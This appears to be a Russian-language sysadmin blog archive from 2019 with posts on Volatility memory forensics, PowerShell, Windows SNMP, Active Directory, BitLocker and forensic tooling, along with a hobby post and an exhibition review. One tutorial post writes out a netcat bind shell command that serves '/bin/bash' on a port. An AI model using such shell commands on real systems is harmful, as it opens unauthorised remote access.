Для работа с дампом оперативной памяти существует отличный фреймворк написанный на языке python - Volatility. Он обладает удобными консольным интерфейсом, который также обладает возможностью напрямую получить доступ к питон шеллу для работы внутри образа.

Основной инструмент использует большое количество плагинов позволяющий выполнить разнообразный анализ изображений памяти. В результате Volatility может работать на любой операционной системе, которая поддерживает Python. Кроме того, волатильность может быть использована против файлы образов памяти из большинства распространенных операционных систем, включая Windows, macOS и Linux.

Пример использования.

sudo apt-get install volatility 

volatility -f image.mem imageinfo - первым делом можно посмотреть информацию о дампе

volatility -f image.mem pslist - возможность увидеть процессы

volatility -f image.mem pstree - дерево процессов

volatility -f image.mem screenshot --dump-dir ~/ -получить скриншот

volatility -f image.mem volshell - получаем интерактивный шелл python

volatility -f image.mem cmdscan - история команд cmd.exe

volatility -f image.mem clipboard - извлечь контент буфера обмена

volatility -f image.mem connscan - увидеть открытые соединения

Monday, 1 April 2019

Своя картина по номерам.

Всем привет.

В последнее время набрала популярность разрисовывать картины по номерам.

Кто-то их называет как "рисовать" т.е. писать картину, но на самом деле это картинка-раскраска для взрослых. Т.е. если маленьким такое предлагалось для умения держать карандаш и различать цвета, то для нас это скорее убить время и успокоить нервы. Кому что нравится. Но в конце концов получается картина маслом (акрил), на которую вы потратили несколько вечеров и которая очень даже неплохо смотрится на расстоянии в пару метров от стены

Общий недостаток у такой картины один - она не уникальна. Такая же может висеть у вашего соседа. Выполненная на том же художественном уровне.) Вы конечно можете попробовать добавить в разрисовку нечто свое но результат предопределен и будет тот же. Есть мнение что такое художество вас развивает как будущего художника. Сомнительно. Разве что это будет хорошей проверкой вашего зрения на способность различать цвета палитры. Больше ничего оно не затронет. Все заранее начертано и все строго по номерам.

Проведу аналогию со сборкой мебели. Там тоже инструкция по сборке, по номерам деталей, и даже указано приблизительное время на сборку. Соблюдай последовательность и все у тебя получится. Похоже? Один в один. Я, к примеру, чтобы было не так скучно собираю мебель без инструкции, а чисто по внешнему виду. Так интересней!

Что можно придумать по поводу картинки по номерам? Самое очевидное это написать свою собственную картину. А что делать если я писать не умею? Это сделать свою, уникальную, картинку по номерам из своего фото.

Wednesday, 27 March 2019

Powershell полезности.

Всем привет.

Есть возможность включить простейший мониторинг изменения содержимого текстового файла. Например файла журнала. Powershell рулит.

Пишем следующее:
Get-Content d:\test.log -Wait -Tail 5

test.log - наш файл журнала 
Tail 5 - показывать последние 5 строк.

При любом добавлении информации в файл test.log она тут же будет отображена в окне Powershell. Есть пару нюансов на выходе если информации в файл будет не добавлена, а наоборот, удалена. В этом случае на выход попадет все что есть в журнале. Также неадекватно себя ведет вывод если добавляется не символ, а только пробел. Как вы понимаете, такое поведение характерно в том случае если журнал изменяется вручную, с помощью редактора, что может служить сигналом о преднамеренном вмешательстве в содержимое файла.

Еще пару полезностей для вывода в Powershell:

- ключик Paging - постраничный вывод, аналог "more" в cmd.

Get-Process | Out-Host -Paging

- ключик PassThru - передача данных по конвейеру дальше из Out-GridView.

Начиная 3-й версии PowerShell Out-GridView поддерживает ключ PassThru, позволяющий передать полученные данные дальше по конвейеру. Например, можно вывести список процессов, в графической оснастке отобрать нужные и передать их командлету Stop-Process, который остановит выбранные процессы:

Get-Process | Out-GridView -PassThru | Stop-Process

Это все.

Saturday, 23 March 2019

Современное искусство.

Привет всем.

Выставка 20-ти номинантов пятого конкурса на соискание Премии Pinchuk Art Centre 2018 - общенациональной премии, которая присуждается украинским художникам в возрасте до 35 лет. Шорт-лист (short-listed set) был выбран отборочной комиссией из более чем 650 заявок, полученных от молодых украинских художников со всех регионов Украины и других стран мира. Каждая работа будет специально создана для этой выставки, формируя экспозицию из 20 индивидуальных пространств, представляющих самостоятельное художественное высказывание.

По случаю вечерней прогулки про Хрещатику в районе Бессарабки и имея в запасе пару часов до поезда решил и я посетить этот центр. Тем более что там стояла очередь на входе из 30 человек. В основном молодежь. Т.е. центр надо считать популярным местом для столичных людей. Раз такое дело то идем и мы.

На входе рамка-металлодетектор и вежливый досмотр личных вещей, без фанатизма. Не понимаю зачем, возможно были какие то эксцессы ранее. Изымают все чем можно вести фото видео съемку, режущие предметы. Смартфоны оставляют. Чтобы ребята на входе не скучали я решил им оставить свой пакет, как в камере хранения, а ребята были не против.)

Итак поднимаемся  на 4-й этаж. Почему 4-й? Не знаю, поехал лифтом за кампанию со студентами. Им, мол, сказали что все самое интересное на 4-м.

Приехали, комнаты направо-налево, притушенный свет, занавесы, инсталляции, слайды, вещи на полу, порванная лента под ногами, пустые бутылки в углу, картины (взрыв цвета, без фокуса) на стенах, фотографии на стенах, старый телевизор показывающий Тома-и-Джери по кругу, раскладушка с грязными вещами,... если вы не поняли это я уже описываю экспозиции номинантов прошлого года. Почти в каждом зале есть Медиатор. Медиатор это девушка или парень которые готовы сделать усилие и попытаться лаконично донести вам смысл экспозиции в конкретной комнате. Очень правильное решение, скажу я вам, иначе труба.)

Wednesday, 20 March 2019

Windows 10 и служба SNMP.

Всем привет.

Пришлось на ровном месте потратить два дня на одну задачку.  

Вот потерял я у себя в Windows 10 службу SNMP.  Служба ловушек SNMP есть, а самой службы нет. Почему так? Может обронил где и выключил при инсталляции? Замечу что такой фокус начинается со сборки 1803. У меня сейчас 1809.

Покопался в сети, спецы советуют включить такой компонент как "Протокол SNMP", вроде все просто. А не так, не оказалось такого компонента в перечне моей Windows 10.

Далее находим советы по доинсталлированию протокола SNMP с помощью Powershell:

- проверка доступных SNMP-служб
Get-Service -Name snmp*

- инсталлирование службы SNMP (утверждают что работает для сборки 1803)
Enable-WindowsOptionalFeature -online -FeatureName SNMP

У меня сборка 1809 поэтому ищем дальше. 

Правим ключик реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\
UseWUServer = 0

- проверка доступных SNMP-служб
Get-WindowsCapability  -Online -Name "SNMP*"

- инсталлирование службы SNMP
Add-WindowsCapability  -Online -Name "SNMP.Client~~~~0.0.1.0"

ИЛИ

- инсталлирование службы SNMP
Add-WindowsCapability  -Online -Name "SNMP.Client*"


Saturday, 16 March 2019

Разница между Get-ADUser и Search-ADAccount.

Всем привет.

Выбирая из AD учетки которые не работали более 90 дней обнаружил интересную статистику по итогам. Как известно такой запрос можно сделать с помощью Get-ADUser или Search-ADAccount.

Пишем:
$d = (Get-Date).AddDays(-90)
$t = New-Timespan –Days 90

Get-ADUser -filter {(enabled -eq "false") -and (lastlogondate -lt $d)} -properties cn,lastlogondate | Select CN,LastLogonDate | measure

ИЛИ

Search-ADAccount –UsersOnly –AccountInactive –TimeSpan $t | sort Name | Select Name,LastLogonDate,DistinguishedName | measure

ИЛИ

Search-ADAccount –UsersOnly –AccountInactive –DateTime $d | sort Name | Select Name,LastLogonDate,DistinguishedName | measure

Так вот в первом запросе итог часто больший чем во втором и третьем. Почему так? А дело  в том что Search-ADAccount всегда выбирает и те учетки по которым входа никогда не было, т.е. у которых поле lastlogondate содержит "пусто".

Поэтому для Get-ADUser надо добавить условие lastlogondate -notlike '*':

Get-ADUser -filter {(enabled -eq "false") -and ((lastlogondate -lt $d) -or (lastlogondate -notlike '*'))} -properties cn,lastlogondate | Select CN,LastLogonDate | measure

На сегодня все.

Электронный ключ к вашему компьютеру.

Всем привет.

Как закрыть доступ к своему компьютеру с помощью электронного ключа?

Просто. До версии Windows 10 существовала штатная утилита syskey, которая после несложных манипуляций записывала вам на флешку файлик, который и являлся электронным ключом. Вставлена флешка при включении - система доступна, а если нет - то недоступна.

В Windows 10 утилита syskey отсутствует. Все построено на сервисе шифрования дисков BitLocker. Плюс к этому ваш ПК должен поддерживать модуль ТРМ  не ниже версии 1.2. Trusted Platform Module (TPM), содержащий в себе криптопроцессор, обеспечивает средства безопасного создания ключей шифрования, способных ограничить использование ключей (как для подписи, так и для шифрования/дешифрования) с той же степенью неповторяемости, что и генератор случайных чисел. 

Поэтому в Windows 10 операция по созданию электронного ключа происходит в три этапа.

Первое, и это естественно, надо включить сам BitLocker для системного диска, например для "С".

Второе, это включить поддержку BitLocker в групповых политиках Computer Configuration > Administrative Templates > Windows Components > BitLocker Drive Encryption > Operating System Drives in the Group Policy window. Двойной клик на "Require Additional Authentication at startup".


И наконец третье. Что еще? Да, вот я долго сам искал фишку почему мой ключ не работает пока не наступил на это третье.

Thursday, 14 March 2019

REVERSE SHELL - удаленная консоль и ее реализация.

Всем привет.

Поговорим про удаленную консоль. Таковая бывает двух видов - REVERSE и BIND.

BIND SHELL - удаленная консоль, когда в роли серверной части выступает удаленная машина, то есть это когда мы сами пошли в гости и получили доступ к чужой консоли.

REVERSE SHELL - удаленная консоль, когда мы выступаем в роли серверной части и вызываем коннект на себя. То есть это когда мы встречаем гостей у себя дома. И когда гости приходят - мы получаем доступ к их консоли.

Как это реализовать?

BIND SHELL. 

1. Для этого на удаленной машине (localhost) выполним команду:

nc -e /bin/bash -nvlp 1337

-e /bin/bash -- команда которую нужно выполнить в случаи удачного подключения, в нашем случае это консоль bash-а которая будет работать интерактивно после подключения.
-n -- numeric-only (использовать только IP-адреса, не использовать dns имена)
-v -- более подробный вывод
-l -- listen-mode (режим слушателя ,который предназначен для входящих соединений)
-p -- порт на котором мы будем слушать

2. На своей машине мы выполним команду:

nc 127.0.0.1 1337

127.0.0.1 - это IP-адрес машины которая ждет подключение
1337 - это порт на котором нас ждут

Когда же применяется BIND SHELL?

А актуален он тогда когда входящие соединения не блокируются сетевыми фаерволами и IP-адрес удаленной машины виден и доступен с любого сегмента сети. К примеру web-сервер на котором размещен сайт всегда имеет выделенный IP-адрес, и мы можем к нему подключиться находясь в глубоком NATе.

Monday, 11 March 2019

Zabbix and LDAP secure authethincation.

Hi everybody.

As you know Zabbix has authethincation methods via Internal, LDAP and HTTP. And how about Secure LDAP? Yes, sure. It can be true also.

So as you can see on the snapshot you have to type in the "LDAP host" field the value as "ldaps://myDC" and in the "Port" field as 636.


If you have a problem with reset authethincation to Internal by Zabbix frontend you can do it in mysql:

mysql -u root -p
UPDATE 'zabbix'.'config' SET 'authentication_type' = '0' WHERE 'config'.'configid' = 1;

See you later.

Sunday, 10 March 2019

Криминалистическая экспертиза цифровых данных.

Всем привет.

Сегодня хочу предложить вам списков технических средств для выполнения криминалистической экспертизы и обработки цифровых данных, которые могут иметь отдельную функциональную нагрузку.

Примеры технических средств выполнения криминалистической копии (создания образа) запоминающих устройств.

Следует руководствоваться рекомендациями, которые определены в разделе 4.2.1 "Copying File from Media" NIST 800-86 Guide to Integrating Forensic Techniques into Incident Response. 

В качестве программных средств создания образа можно использовать:
- утилиты dd и dc3dd для UNIX-систем;
- программы FTK Imager, EnCase Forensic Imager или Redline для Windows-систем:
- программу Belkasoft Evidence Center для Windows, Linux, MacOS, iOS, Android, Windows Phone, Blackberry-систем;
- программу The Sleuth Kit для Windows, MacOS, Linux, Solaris, OpenBSD, FreeBSD-систем.

В качестве программных средств вычисления значений хэш-функций можно использовать:
- программы md5sum или sha256sum для Linux-систем;
- программы Memoryze для Windows и MacOS-систем:
- программу dff для Windows и Linux-систем.

В качестве специализированных программных средств "write-blocker" можно использовать:
- программу dff для Windows и Linux-систем;
- следует руководствоваться рекомендациями, которые определены в разделе 4.2.2 "Data File Integrity" NIST 800-86 Guide to Integrating Forensic Techniques into Incident Response.

Friday, 8 March 2019

Практика с мультимедиа в PDF-документе.

Всем привет.

Небольшая практика по поводу мультимедиа в PDF-документе. Если помните я писал про это здесь

Так вот решил я озвучить один PDF-документ с помощью вставки MP3-треков.Так чтобы читатель при прочтении каждой страницы в фоне слышал соответствующую музыку. Задача ставилась сделать это максимально без участия читателя. Он читает и не должен отвлекаться от приятного чтения. Это можно? Не проблема. 

Проблемы появились  в другом. 

Во первых, если саундтрек запускается при появлении страницы, а прекращается при ее исчезновении(закрытии) с просмотра, то на большом мониторе страниц на просмотр может быть и две. А значит и саундтреки накладываются при звучании. Предлагать читателю самому выключать саундтрек не есть хорошо. И один саунд-трек не вытесняет другой.

Во вторых, для проигрывания мультимедиа (mp3, swf, mp4) необходимо дополнительно и заранее инсталлировать в систему Flash-плеер. Иначе открытый PDF-документ будет надоедать читателю напоминанием об этом.

Следующее. Размер PDF-документа увеличивается ровно на размер мультимедиа. Ок, размеры саунд-треков еще можно вытерпеть, но если внедрять MP4-видеоролик то тут надо десять раз подумать. В сети находил обходной маневр - с помощью дополнительного виджета youtube-widget-for-pdf.swf. Т.е. вы внедряете в свой PDF-документ этот SWF-объект, а уже в нем вставляете код вставки от youtube. Просто и гениально. Непонятно почему это не штатная функция  для PDF-документа. С другой стороны так можно легко вставить  в документ и скрипт вируса. 

Вот такая практика с мультимедиа.


Версия на печать

Популярное

Медиа облако